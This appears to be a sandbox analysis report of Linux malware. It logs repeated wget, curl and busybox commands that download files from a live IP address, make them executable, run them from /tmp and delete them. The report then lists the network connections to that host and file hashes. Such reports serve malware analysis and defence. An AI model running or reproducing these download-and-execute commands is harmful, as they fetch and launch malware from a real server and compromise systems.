[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx

[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/rm

[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/usr/bin/wget

[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/chmod

[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu

[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/rm

[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/wget

[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/chmod

[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY

[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/rm

[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/wget

[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/chmod

[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959

[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/rm

[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/wget

[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/chmod

[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR

[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/rm

[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/wget

[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/chmod

[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu

[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/rm

[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/wget

[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/chmod

[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY

[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/rm

[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/wget

[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/chmod

[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959

[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/rm

[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/wget

[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/chmod

[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR

[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/rm

[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/wget

[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/chmod

[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/rm

[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/chmod

[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z

[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/rm

[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/chmod

[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI

[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/rm

[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/chmod

[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0

[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/rm

[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/wget

[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/chmod

[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf

[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/rm

[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/wget

[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/chmod

[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk

[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/rm

[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/wget

[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/chmod

[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh

[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/rm

[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/wget

[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/chmod

[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC

[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/rm

[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/wget

[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/chmod

[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR

[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/rm

[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/wget

[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/chmod

[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx

[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/rm

[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97